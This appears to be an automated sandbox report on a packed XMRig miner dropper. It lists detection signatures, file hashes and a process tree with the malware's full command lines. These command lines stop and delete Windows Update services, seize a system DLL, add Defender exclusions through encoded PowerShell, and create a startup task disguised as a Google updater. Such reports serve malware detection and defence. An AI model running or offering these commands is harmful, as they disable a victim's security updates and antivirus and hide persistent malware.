Analysis
-
max time kernel
300s -
max time network
294s -
platform
windows10_x64 -
resource
win10-20220414-en -
submitted
11-07-2022 22:46
General
-
Target
1dd13dd40b5cd6001d2e97a2162788d7d6d460f5bd6959c4c0c08c0050fc1f9e.exe
-
Size
8.4MB
-
MD5
bf01b8e7ce0968ebe87d2c912f5a47b4
-
SHA1
3fc5556bb316658afcf051e7e1bfb26a6483169f
-
SHA256
1dd13dd40b5cd6001d2e97a2162788d7d6d460f5bd6959c4c0c08c0050fc1f9e
-
SHA512
1886936cd0d5f1e6dd9bcb66a720490112da5ffe3c3ea1da95fcedc010acb6b9c16a1e3cc9369881ec02f2600715d6925f9018d7ab581a5141299246afdab887
Score
10/10
Malware Config
Signatures
-
Modifies security service 2 TTPs 5 IoCs
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
-
XMRig Miner payload 3 IoCs
-
Drops file in Drivers directory 2 IoCs
-
Executes dropped EXE 2 IoCs
-
Possible privilege escalation attempt 4 IoCs
-
Stops running service(s) 3 TTPs
-
Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Drops startup file 2 IoCs
-
Modifies file permissions 1 TTPs 4 IoCs
-
Themida packer 10 IoCs
Detects Themida, an advanced Windows software protection system.
-
Checks whether UAC is enabled 1 TTPs 2 IoCs
-
Drops file in System32 directory 4 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
-
Suspicious use of SetThreadContext 1 IoCs
-
Drops file in Program Files directory 3 IoCs
-
Drops file in Windows directory 3 IoCs
-
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Modifies Internet Explorer settings 1 TTPs 3 IoCs
-
Modifies data under HKEY_USERS 64 IoCs
-
Modifies registry class 64 IoCs
-
Modifies registry key 1 TTPs 18 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: LoadsDriver 1 IoCs
-
Suspicious behavior: MapViewOfSection 2 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of SetWindowsHookEx 3 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\1dd13dd40b5cd6001d2e97a2162788d7d6d460f5bd6959c4c0c08c0050fc1f9e.exe"C:\Users\Admin\AppData\Local\Temp\1dd13dd40b5cd6001d2e97a2162788d7d6d460f5bd6959c4c0c08c0050fc1f9e.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Temp\setup.exe"C:\Windows\Temp\setup.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Drops file in Drivers directory
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHIAeAAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAYQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBsAGgAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAYwBtAGsAZgAjAD4A"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\sc.exesc stop UsoSvc4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop wuauserv4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop bits4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop dosvc4⤵
- Launches sc.exe
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f4⤵
- Modifies security service
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\WaaSMedicSvc.dll4⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 03⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHoAZwB2AGwAIwA+ACAAUgBlAGcAaQBzAHQAZQByAC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawAgAC0AQQBjAHQAaQBvAG4AIAAoAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBBAGMAdABpAG8AbgAgAC0ARQB4AGUAYwB1AHQAZQAgACcAcABvAHcAZQByAHMAaABlAGwAbAAnACAALQBBAHIAZwB1AG0AZQBuAHQAIAAnAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAAIgBQAEEAQQBqAEEARwBrAEEAZABBAEIAdwBBAEgAVQBBAEkAdwBBACsAQQBDAEEAQQBVAHcAQgAwAEEARwBFAEEAYwBnAEIAMABBAEMAMABBAFUAQQBCAHkAQQBHADgAQQBZAHcAQgBsAEEASABNAEEAYwB3AEEAZwBBAEMAMABBAFIAZwBCAHAAQQBHAHcAQQBaAFEAQgBRAEEARwBFAEEAZABBAEIAbwBBAEMAQQBBAEoAdwBCAEQAQQBEAG8AQQBYAEEAQgBRAEEASABJAEEAYgB3AEIAbgBBAEgASQBBAFkAUQBCAHQAQQBDAEEAQQBSAGcAQgBwAEEARwB3AEEAWgBRAEIAegBBAEYAdwBBAFIAdwBCAHYAQQBHADgAQQBaAHcAQgBzAEEARwBVAEEAWABBAEIARABBAEcAZwBBAGMAZwBCAHYAQQBHADAAQQBaAFEAQgBjAEEASABVAEEAYwBBAEIAawBBAEcARQBBAGQAQQBCAGwAQQBIAEkAQQBMAGcAQgBsAEEASABnAEEAWgBRAEEAbgBBAEMAQQBBAEwAUQBCAFcAQQBHAFUAQQBjAGcAQgBpAEEAQwBBAEEAVQBnAEIAMQBBAEcANABBAFEAUQBCAHoAQQBDAEEAQQBQAEEAQQBqAEEARwBrAEEAZQBRAEIAbQBBAEMATQBBAFAAZwBBAD0AIgAnACkAIAA8ACMAaABuAG8AYgAjAD4AIAAtAFQAcgBpAGcAZwBlAHIAIAAoAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBUAHIAaQBnAGcAZQByACAALQBBAHQAUwB0AGEAcgB0AHUAcAApACAAPAAjAGUAaABxACMAPgAgAC0AUwBlAHQAdABpAG4AZwBzACAAKABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAUwBlAHQAdABpAG4AZwBzAFMAZQB0ACAALQBBAGwAbABvAHcAUwB0AGEAcgB0AEkAZgBPAG4AQgBhAHQAdABlAHIAaQBlAHMAIAAtAEQAaQBzAGEAbABsAG8AdwBIAGEAcgBkAFQAZQByAG0AaQBuAGEAdABlACAALQBEAG8AbgB0AFMAdABvAHAASQBmAEcAbwBpAG4AZwBPAG4AQgBhAHQAdABlAHIAaQBlAHMAIAAtAEQAbwBuAHQAUwB0AG8AcABPAG4ASQBkAGwAZQBFAG4AZAAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AVABpAG0AZQBMAGkAbQBpAHQAIAAoAE4AZQB3AC0AVABpAG0AZQBTAHAAYQBuACAALQBEAGEAeQBzACAAMQAwADAAMAApACkAIAA8ACMAbABvACMAPgAgAC0AVABhAHMAawBOAGEAbQBlACAAJwBHAG8AbwBnAGwAZQBVAHAAZABhAHQAZQBUAGEAcwBrAE0AYQBjAGgAaQBuAGUAUQBDACcAIAAtAFUAcwBlAHIAIAAnAFMAeQBzAHQAZQBtACcAIAAtAFIAdQBuAEwAZQB2AGUAbAAgACcASABpAGcAaABlAHMAdAAnACAALQBGAG8AcgBjAGUAIAA8ACMAeABtAGoAIwA+ADsAIABDAG8AcAB5AC0ASQB0AGUAbQAgACcAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAXABzAGUAdAB1AHAALgBlAHgAZQAnACAALQBEAGUAcwB0AGkAbgBhAHQAaQBvAG4AIAAnAEMAOgBcAFAAcgBvAGcAcgBhAG0AIABGAGkAbABlAHMAXABHAG8AbwBnAGwAZQBcAEMAaAByAG8AbQBlAFwAdQBwAGQAYQB0AGUAcgAuAGUAeABlACcAIAAtAEYAbwByAGMAZQAgADwAIwB6AGEAZgBlACMAPgA7ACAAUwB0AGEAcgB0AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawAgADwAIwBxAHIAdQAjAD4AIAAtAFQAYQBzAGsATgBhAG0AZQAgACcARwBvAG8AZwBsAGUAVQBwAGQAYQB0AGUAVABhAHMAawBNAGEAYwBoAGkAbgBlAFEAQwAnADsA"3⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Windows\Temp\run.bat" "2⤵
- Drops startup file
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Windows\Temp\lol.bat" "2⤵
- Checks computer location settings
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -EncodedCommand "PAAjAGkAdABwAHUAIwA+ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAJwBDADoAXABQAHIAbwBnAHIAYQBtACAARgBpAGwAZQBzAFwARwBvAG8AZwBsAGUAXABDAGgAcgBvAG0AZQBcAHUAcABkAGEAdABlAHIALgBlAHgAZQAnACAALQBWAGUAcgBiACAAUgB1AG4AQQBzACAAPAAjAGkAeQBmACMAPgA="1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\updater.exe"C:\Program Files\Google\Chrome\updater.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Drops file in Drivers directory
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Drops file in System32 directory
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHIAeAAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAYQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBsAGgAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAYwBtAGsAZgAjAD4A"3⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE3⤵
-
C:\Windows\system32\sc.exesc stop UsoSvc4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop wuauserv4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop bits4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop dosvc4⤵
- Launches sc.exe
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\WaaSMedicSvc.dll4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 03⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 04⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 04⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 04⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 04⤵
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe "caeiycpbls"3⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe iekwqievux1 GoySvqjslEz2cJjLp/l+rjzn6ce4jALjhSdARaKlIdOzscb8uSA4DC45OD1DpPEqN5dCL6SdfpGQxdbsBsqueaxRnQzTx2Bqmg+8Hm/cXMESqb4c3Os26fGj23Hqsnl0qmcpNr8N8RD0Uj65Is/XzsC3UFIPpYz7Zp9mKjXqYW+xHlpEMJ8pitovpD3AlrEcYhafjTHJIBsyQCmYqS8DwlNaC3+8ctTQ5gWGWPwhQ4m7w5ntgK8u6m/StfnNPDdr+VwS4s25pICn3Q/Dq0WEk/j+SBlrEi93dXqUBShtLfUbnT4w5YQhLxDVbXc7xoFDxTT1Aj0GXAqezP+QaaEKngoz7IIs0HRU4PjNQ8sX5Cp9CapU5M7riEzFU5NImjjRBCIwVk50Qq9ALtXJ97ThIFbcA+WbsVSt1P3sJ9FeWD1R/D9J20Eo+ttLy+uUvBPCMjAqT/aC6UHrEm7PCBT6nZKMepJamLsPmXfl5aXnRDA=3⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files\Google\Chrome\updater.exeFilesize
8.2MB
MD56bfb0d56a3d08f929a939f3f12704f2f
SHA1051f687e8bf80f12edca2ad99381e78a8448c713
SHA2563f157d38f175529138a54555ba6078c67837b87da8452fd55011f82aeb637dfb
SHA512db765b15d6304b7005e04622dfb4c5363064aaf945700cf26a467725b7e3f554e098953932d02fb46620fb3d5346d2dd08aaf2e3dec6a31fe079f785378ec711
-
C:\Program Files\Google\Chrome\updater.exeFilesize
8.2MB
MD56bfb0d56a3d08f929a939f3f12704f2f
SHA1051f687e8bf80f12edca2ad99381e78a8448c713
SHA2563f157d38f175529138a54555ba6078c67837b87da8452fd55011f82aeb637dfb
SHA512db765b15d6304b7005e04622dfb4c5363064aaf945700cf26a467725b7e3f554e098953932d02fb46620fb3d5346d2dd08aaf2e3dec6a31fe079f785378ec711
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
3KB
MD58592ba100a78835a6b94d5949e13dfc1
SHA163e901200ab9a57c7dd4c078d7f75dcd3b357020
SHA256fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c
SHA51287f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5f756fcdb0424693b0b660341353c2fcc
SHA13168c6d324ab001d79d7cb04d90b8b3857d23374
SHA256d10a5e1ca2f76f7cae1827da50225b92ea90a332d53d2f95123c79b04e6c0979
SHA51202b59e7497e0b76448d81268dc9d65a9fe848fb4e62bb91ded2be38f31c5a041ee7bbc23f219549d6993fe6a02027b942523c0280eeb7d600d15216d99b4fdde
-
C:\Windows\Temp\lol.batFilesize
59B
MD5f580e0e80cc87b25e38ea2c0c8059d04
SHA1299f51dca9c609d6da86f93c424e39c1e6ba0d94
SHA2569e7b9ed63bd5dfe290fda58104cd98e8d23ba671d3ccb77e82e8b0f7812fb734
SHA5125a0a1e4d3800ee76fc4d1d102ffe7e0d4e646c08f57f20c019741c3779ca85dc8a1240c77c90b0caef498859de960e71be3a81497b5ffac8b381aa2c7813e83d
-
C:\Windows\Temp\run.batFilesize
98B
MD5731afe244b2414169a5f630d52646e56
SHA1e3771ccdccd8c306ee5fc4f264cfc3310690458c
SHA2566c24e5b6a9aaced68f9f93581913bdea4cc1077060827d5d59d6680859e4e552
SHA51284e0dc44ae3eadf6d31484119294126f5a056add94733fea2ba5597b6a302fc107117f5c5029d4ce0ff8e5c859c4de9c456aa5f01d420f25a3d56dc569801ff1
-
C:\Windows\Temp\setup.exeFilesize
8.2MB
